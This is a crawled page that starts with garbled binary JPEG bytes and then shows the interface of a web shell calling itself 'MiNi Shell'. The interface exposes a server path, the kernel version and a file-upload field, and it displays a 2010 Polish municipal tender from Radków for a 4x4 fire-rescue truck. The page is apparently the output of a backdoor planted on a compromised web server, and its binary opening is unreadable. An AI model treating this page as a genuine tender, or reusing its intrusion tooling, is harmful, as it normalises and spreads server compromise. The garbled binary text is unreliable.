JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/379330-N-2010.html

<p class="kh_header"><b>Radków: Zakup średniego samochodu Ratowniczo - Gaśniczego 
z napędem uterenowionym 4x4</b><br>
<b>Numer ogłoszenia: 379330 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radków , ul. Rynek 1, 57-420 Radków, woj. dolnośląskie, tel. 074 8735000, faks 074 8735015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radkowklodzki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup średniego samochodu Ratowniczo - Gaśniczego 
z napędem uterenowionym 4x4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup średniego samochodu Ratowniczo - Gaśniczego 
z napędem uterenowionym 4x4 o poniższych parametrach:

1.Podwozie:
Podwozie samochodu z manualną skrzynią biegów - z silnikiem z turbodoładowaniem o zapłonie samoczynnym, o mocy powyżej 260 KM. Silnik spełniający normy czystości spalin zgodnie z przepisami ustawy prawo o ruchu drogowym bez konieczności stosowania dodatkowych płynów w układzie spalinowym,
Układ kierowniczy ze wspomaganiem,
Układ hamulcowy wyposażony w ABS (możliwość odłączenia podczas jazdy w terenie),
Ciśnienie w układzie hamulcowym 10 bar,
Instalacja pneumatyczna pojazdu zapewnia możliwość wyjazdu w ciągu 60s od chwili uruchomienia silnika samochodu,
Napęd uterenowiony - 4x4 z możliwością odłączenia osi przedniej, skrzynia redukcyjna, możliwość blokady mechanizmów różnicowych osi tylnej i przedniej oraz między  osiowego, pojedyncze koła na osi przedniej na tylnej osi podwójne,
Podwozie pojazdu o wzmocnionym zawieszeniu w związku ze stałym obciążeniem pojazdu, przód - resory paraboliczne, tył - pneumatyczne z możliwością regulacji wysokości,
Pojazd ma być wyposażony w hak holowniczy z tyłu pojazdu posiadający homologację lub znak bezpieczeństwa Samochód musi być wyposażony w zaczep holowniczy i szekle z przodu umożliwiające odholowanie pojazdu.
Podstawowa obsługa silnika możliwa bez podnoszenia kabiny,
Silnik pojazdu musi być dostosowany do ciągłej pracy bez uzupełniania cieczy chłodzącej, oleju oraz przekraczania dopuszczalnych parametrów pracy,
Przystawka odbioru mocy przystosowana do długiej pracy , z sygnalizacją włączenia w kabinie kierowcy,
Lusterka zewnętrzne elektrycznie podgrzewane i regulowane,
Ogumienie uniwersalne z bieżnikiem dostosowanym do różnych warunków atmosferycznych,
Pełnowymiarowe koło zapasowe,
Pojemność zbiornika paliwa - 130 litrów zapewnia przejazd min. 300km oraz 4 godz. pracę autopompy,
Akumulatory wzmocnione 2 x 160 Ah,
Alternator o mocy 1920 W.
2.Kabina:
Kabina czterodrzwiowa, jednomodułowa, podnoszona hydraulicznie, zawieszona na poduszkach pneumatycznych w układzie miejsc 1+1+4 (siedzenia przodem do kierunku jazdy), kabina wyposażona w :
- indywidualne oświetlenie nad siedzeniem dowódcy,
- klapa wentylacyjna w dachu,
- niezależny układ ogrzewania i wentylacji, umożliwiający ogrzewanie kabiny przy    wyłączonym silniku,
- reflektor ręczny (szperacz) do oświetlania numerów budynków,
- uchwyt poprzeczny dla załogi zamontowany za siedzeniami dowódcy i kierowcy,
Fotele wyposażone w bezwładnościowe pasy bezpieczeństwa:
- siedzenia pokryte materiałem łatwo zmywalnym, odpornym na rozdarcie i ścieranie,
- wszystkie fotele wyposażone w zagłówki,
- fotel dla kierowcy z regulacją wysokości , odległości  i pochylenia oparcia
Na dachu kabiny zamontowane ma być urządzenie sygnalizacyjno - ostrzegawcze, akustyczne i świetlne sterujące 2 lampami ostrzegawczymi niebieskimi i głośnikiem (+ lampa niebieska z tyłu pojazdu na zabudowie). Urządzenie akustyczne ma umożliwiać podawanie komunikatów słownych za pomocą radiotelefonu,
Dodatkowo kabina ma być wyposażona w 2 lampy stroboskopowe niebieskie mocowane z przodu pojazdu,
Z tyłu pojazdu fala świetlna - kolor pomarańczowy,
Dodatkowy sygnał pneumatyczny, ma być włączany dodatkowym włącznikiem z miejsca kierowcy,
Instalacja elektryczna jednoprzewodowa 24V, biegunem ujemnym na masie,
Instalacja wyposażona w główny wyłącznik prądu,
Pojazd musi być wyposażony w gniazdo (z wtyczką) do ładowania akumulatorów ze źródła zewnętrznego umieszczone po lewej stronie (sygnalizacja podłączenia do zewnętrznego źródła w kabinie kierowcy),
W kabinie kierowcy ma być zamontowany radiotelefon, w zakresie częstotliwości VHF 136 - 174 MHz, moc 1-25 W i odstęp międzykanałowy 12,5 kHz oraz dodatkowym zewnętrznym głośnikiem i mikrofonem w przedziale autopompy,
Pojazd musi być wyposażony w sygnalizację świetlną i dźwiękową włączonego biegu wstecznego. Jako sygnalizacja świetlna - światło cofania.
3. Zabudowa:
Zabudowa ma być wykonana z materiałów odpornych na korozję (stal nierdzewna, aluminium),
Poszycia wewnętrzne skrytek wykonane z blachy aluminiowej,
Skrytki na sprzęt i wyposażenie muszą być zamykane żaluzjami wodno i pyłoszczelnymi wspomaganymi systemem sprężynowym wykonane z aluminium, wyposażone w zamki zamykane na klucz , jeden klucz pasuje do wszystkich zamków,
Skrytki na sprzęt i przedział autopompy SA mają być wyposażone w oświetlenie włączane automatycznie po otwarciu drzwi skrytki, w kabinie sygnalizacja świetlna i dźwiękowa otwarcia skrytek.
- główny wyłącznik oświetlenia skrytek ma być zainstalowany w kabinie kierowcy,
Autopompa powinna umożliwiać podanie wody do zbiornika samochodu,
Autopompa musi być wyposażona w urządzenie odpowietrzające umożliwiające zassanie wody z głębokości 1,5m w czasie do 30s, z głębokości 7,5m w czasie do 60s,
W przedziale autopompy znajdować się muszą następujące urządzenia kontrolno - sterownicze pracy pompy:
- manowakuometr,
- manometr niskiego ciśnienia oraz manometr wysokiego ciśnienia ,
- wskaźnik poziomu wody w zbiorniku samochodu,
- wskaźnik poziomu środka pianotwórczego w zbiorniku,
- miernik prędkości obrotowej silnika pojazdu,
- regulator prędkości obrotowej wału autopompy,
- wyłącznik silnika pojazdu,
- kontrolka temperatury cieczy chłodzącej silnika i ciśnienia oleju,
W kabinie kierowcy znajdować się muszą urządzenia kontrolno - pomiarowe:
- manometr niskiego ciśnienia,
- wskaźnik poziomu wody w zbiorniku samochodu ,
- wskaźnik poziomu środka pianotwórczego w zbiorniku samochodu,
- licznik motogodzin pracy autopompy,
Wszystkie elementy układu wodno - pianowego mają być odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych, modyfikatorów. Konstrukcja układu wodno - pianowego ma umożliwiać całkowite odwodnienie przy użyciu dwóch zaworów,
Przedział autopompy ma być wyposażony w system do ogrzewania tego samego producenta   jak urządzenie w kabinie kierowcy, skutecznie zabezpieczający układ  wodno - pianowy przed zamarzaniem w temperaturze do -25st.C.
4. Kolorystyka:
- nadwozie z kabiną i zabudowa w kolorze czerwonym - RAL 3000,
- błotniki i zderzaki w kolorze białym,
- podwozie i rama w kolorze czarnym lub szarym, zabezpieczone przed korozją
5. Urządzenia dodatkowe:
Wyciągarka elektryczna  - powyżej 5 t,
Maszt oświetleniowy, pneumatyczny, 4 x 500W, sterowanie elektryczne pracą.
Dodatkowe sygnały dźwiękowe, pneumatyczne
6. Wyposażenie dodatkowe:
- węże tłoczne W52    10 szt.
- węże tłoczne W75    10 szt.
- prądownice pianowe   1 szt.
- wytwornice pianowe  1  szt.
- prądownice wodne 4 szt.
- motopompa pływająca 
- agregat prądotwórczy 
- drabina pożarnicza wysuwana
- aparat powietrzny - 2 szt.
- wentylator oddymiający - 1 szt.
- radiotelefon nasobny z jedną ładowarką samochodową 4 stanowiskową - 6 szt.
- latarki przenośne, pożarnicze - 4 szt.
- ubranie koszarowe 4 - częściowe - 6 szt.
- buty strażackie - 6 par.
- przenośny system oświetlenia pola akcji - 1 komplet ze statywem.
    
Na samochodzie zapewnione jest  miejsce i mocowania na przewożenie sprzętu i wyposażenia zgodnie z CNBOP.
7.Gwarancja:
Na pojazd Wykonawca udzieli 24 miesięcznej gwarancji.  Okres gwarancji liczony będzie od dnia protokolarnego przekazania przedmiotu umowy, stwierdzającego wykonanie przedmiotu umowy bez wad.
8.Pozostałe wymagania:
Ze względu na planowane dofinansowanie zakupu przedmiotu umowy w ramach projektu Współpraca jednostek straży pożarnej na czesko-polskim pograniczu, modernizacja wyposażenia i wzajemna pomoc w sytuacjach kryzysowych nr CZ.3.22/1.3.00/09.01567 współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Republika Czeska - Rzeczpospolita Polska 2007-2013, po konsultacji i w uzgodnieniu z Zamawiającym pojazd należy wyposażyć w trwałe oznaczenia w formie naklejek lub tabliczek informacyjnych zgodnie z działaniami wymienionymi we wniosku projektowym i zgodnie z Rozporządzeniem Komisji (WE) nr 1828/2006. Trwałość i czytelność ww. oznaczeń winna być zapewniona na okres co najmniej 6 lat. Elektroniczną treść oznaczenia dostarczy Zamawiający.  
9.Wykonawca powinien posiadać własny serwis gwarancyjny i  pogwarancyjny dla zabudowy i podwozia.
Wykonawca usunie ewentualne awarie przedmiotu zamówienia w ciągu 48 godzin od terminu ich pisemnego (faksem) zgłoszenia przez Zamawiającego.
Wykonawca zagwarantuje przyjazd serwisu i usunięcie awarii w ciągu 48 godzin (w dni robocze) od pisemnego(fax.) zgłoszenia awarii, oraz udostępni nieodpłatnie (w czasie trwania gwarancji) pojazdu zamiennego o podobnych parametrach jak dostarczony - w przypadku, gdy awaria pojazdu spowoduje jego unieruchomienie na czas dłuższy niż 2  dni robocze od daty zgłoszenia się serwisu. Do  okresu naprawy nie wlicza się dni ustawowo wolnych od pracy.
10. Wykonawca dostarczy najpóźniej w dniu dostawy niezbędną dokumentację w języku polskim:
  - wyciąg ze świadectwa homologacji i pozostałą dokumentację niezbędną do zarejestrowania kompletnego pojazdu - zgodnie z ustawą prawo o ruchu drogowym,
- instrukcję obsługi i konserwacji dla podwozia samochodowego i zabudowy w języku  polskim,
- książkę serwisową i kartę gwarancyjną oraz katalog części zamiennych.
11.Wykonawca zapewni w siedzibie zamawiającego na swój koszt szkolenie czterech pracowników w zakresie obsługi i konserwacji pojazdu.
12. Zamawiający nie przewiduje zatrudnienia osób określonych w art. 29 ust. 4 ustawy Pzp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek wiedzy i doświadczenia oceniony zostanie na podstawie wykazu zrealizowanych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Warunek zostanie uznany za spełniony jeżeli w tych latach wykonawca wykonał co najmniej dwie dostawy -  odpowiadających rodzajowo i wartościowo przedmiotowi zamówienia, z podaniem odbiorcy, wartości i terminu dostawy oraz załączy dokument potwierdzający, że dostawa ta została wykonana należycie (referencje, protokół zdawczo-odbiorczy)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, wobec których jest brak podstaw do wykluczenia w rozumieniu art. 24 ust.1 ustawy Prawo  zamówień publicznych,
- Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli złoży oświadczenie oraz dokumenty wymienione w pkt 10 niniejszej siwz
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentów złożonych przez wykonawców. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia- załącznik nr 5 do siwz
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej(zgodnie z § 4 Rozporządzenie Prezesa Rady Ministrów z dnia 30.12.2009  r.(Dz. U. z 2009r. Nr 226, poz. 1817) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane) przedkłada dokumenty jakich  Zamawiający wymaga od Wykonawców mających swoją siedzibę w RP ( pkt. 10.1, 10.2, 10.3. siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)wypełniony Formularz ofertowy z odpowiednimi dokumentami  tj. ogólnodostępnymi materiałami handlowymi np.: foldery (katalogi) ze zdjęciami oferowanego samochodu oraz opisem i parametrami technicznymi w języku polskim, potwierdzające zgodność oferowanego samochodu z wymaganiami określonymi przez Zamawiającego oraz Świadectwo Homologacji Typu na pojazd kompletny, wydane przez  właściwego ministra , aktualne na dzień składania ofert, kopia załączona do oferty- załącznik Nr 1 do siwz.
b) W przypadku  zamiaru powierzenia części zamówienia podwykonawcom lub innym podmiotom, które będą brały udział w realizacji zadania Wykonawca zobowiązany będzie wskazać część zamówienia, które zamierza im powierzyć- na druku formularza stanowiącego załącznik nr 6
c) Zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia- załącznik nr 5.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radkowklodzki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Radkowie, Rynek 1, 57-420  Radków, pokój nr 2c, od poniedziałku do piątku w godzinach od 8.00 - 15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2010 godzina 10:00, miejsce: Urząd Miasta i Gminy w Radkowie,Rynek 1, 57-420 Radków, pok nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach działania Współpraca jednostek straży pożarnej na czesko-polskim pograniczu, modernizacja wyposażenia i wzajemna pomoc w  sytuacjach  kryzysowych, objętego Programem Operacyjnym Współpracy Transgranicznej Republika Czeska - Rzeczpospolita Polska 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com